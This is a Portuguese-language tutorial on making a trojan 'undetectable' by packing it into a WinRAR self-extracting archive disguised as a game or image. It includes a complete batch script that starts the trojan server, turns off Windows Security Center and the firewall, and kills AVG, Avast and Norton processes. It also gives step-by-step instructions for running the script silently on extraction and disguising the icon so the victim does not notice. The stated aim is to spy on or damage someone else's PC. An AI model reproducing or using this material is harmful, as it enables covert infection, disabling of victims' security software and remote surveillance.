Tutorial – Trojan indetectável (Duas das formas)Com este tutorial você irá aprender a deixar um trojan indetectável com o Winrar,
fazendo um bom uso das configurações SFX que o programa disponibiliza.
Vai da criatividade de cada um a forma de executar os comandos contidos no nosso
“pacote de objetos maliciosos”, vou mostrar uma forma bem básica de executar um
trojan e desabilitar as defesas do Firewall sem que a vítima note!
Pra isso será necessário:
Winrar:
~> http://baixaki.ig.com.br/download/WinRAR.htm
Um jogo qualquer (pode ser qualquer outro arquivo de sua preferência) que pode ser
encontrado aqui:
~> http://www.baixaki.com
Bloco de notas:
~> Iniciar / Programas / Acessórios
Um Servidor de algum programa de monitoração remota (netbus, prorat, turkojan,
enfim qualquer trojan), que chamarei de server.exe.
Siga as seguintes etapas:
1°) Se for usar o mesmo jogo que mencionei, descompacte-o em uma pasta qualquer
(vamos dizer C:\).
2°) Digite (ou copie e cole) os seguintes comandos no bloco de notas:
@echo off
Start server.exe
break off
cd\
net stop wscsvc >nul
sc config wscsvc start= disabled
cls
netsh firewall set opmode mode=disable >nul
net stop SharedAccess >nul
goto avg
:avg
taskkill /f /im avgcc.exe >nul
taskkill /f /im avgcc.exe >nul
taskkill /f /im avgamsvr.exe >nul
taskkill /f /im avgupsvc.exe >nul
taskkill /f /im avgw.exe >nul
taskkill /f /im avgcc32.exe >nul
taskkill /f /im avgctrl.exe >nul
taskkill /f /im avgserv.exe >nul
taskkill /f /im avgserv9.exe >nul
taskkill /f /im avgserv9schedapp.exe >nul
taskkill /f /im avgw.exe >nul
goto avast
:avast
taskkill /f /im ashwebsv.exe >nul
taskkill /f /im ashdisp.exe >nul
taskkill /f /im ashmaisv.exe >nul
taskkill /f /im ashserv.exe >nul
taskkill /f /im ashwebsv.exe >nul
goto norton
:norton
taskkill /f /im norton.exe >nul
taskkill /f /im Norton Auto-Protect.exe >nul
taskkill /f /im norton_av.exe >nul
taskkill /f /im nortonav.exe >nul
msg * End of instalation!
exit
:
3°) Salve na extensão .bat (comando do MS-DOS) – Com estes comandos,
desabilitaremos o Firewall da vítima (se for do Windows) e também o antivírus (se for:
AVG, Norton ou Avast), que aqui neste caso irei chamar de Arquivo.bat.
4°)Agora deixe na mesma pasta todos os arquivos que nos interessa: Todos os do
jogo, o Server.exe e o arquivo.exe.
5°)Selecione todos os arquivos e clique com o botão direito do mouse e vá em
“Adicionar para o arquivo” (opção com o Winrar instalado).
6°)Na primeira aba “Geral” escolha o caminho para a criação do arquivo e em “Opções
de compressão” marque a opção “Criar arquivo SFX”; Na aba “Avançado” clique em
“Opções SFX” e deverá abrir outra janela, onde você irá escolher o caminho para a
extração no PC da vítima (ela pode mudar depois se quiser), vamos usar como
exemplo C:\ e em “Configuração do Programa” preencha o campo “Executar após a
extração” com o nome do arquivo de comando do DOS, neste caso: arquivo.bat. Clique
em OK e em OK novamente.
7°) O arquivo deverá ser criado na pasta que você escolheu!
8°) De preferência, troque o ícone por um relativo ao jogo e mande pra quem você
quer observar, deste modo pode ser feito com badcom´s, faça o mesmo procedimento
e vocêpoderá ferrar com o PC de alguém!
OBS:
~> Esta é uma das maneiras que se tem do AV não detectar o trojan (como visto, não
serve pra qualquer AV).
~> Na escolha do arquivo de disfarce, de preferência escolha um que ocupe toda a
tela do PC, pois quando se der a instalação irá se abrir a janela do prompt de
comando do DOS e se a vítima perceber os processos se finalizando poderá por em
risco a eficácia do plano.
~> Não escolha um arquivo muito pesado, já que ele será apenas o disfarce do trojan.
~> Sabendo um pouco de comandos do DOS em arquivos .bat, use da criatividade pra
deixar mais eficaz o arquivo de instalação do Winrar.
~> Aproveite os outros tópicos para criar um trojan e este para colocá-lo em ação!
Mais um jeito fácil ai com WINRAR
1° clica com o botão direito sobre o executável (o vírus) e clica em adicionar para o arquivo
2º Irá abrir uma janela, mude de .rar para .exe.
3º Clique na aba Avançado e depois em Opções SFX..., Põem o nome do arquivo que será executado, no caso o nome do vírus que você esta camuflando.
4º Clique na aba Métodos e marque as Opções Ocultar Tudo e Ignorar arquivos existentes.
5º Clique na aba Texto e Ícone e clique em Procurar...
6º Use um ícone que sua vitima não possa desconfiar no tutorial eu usei de uma imagem..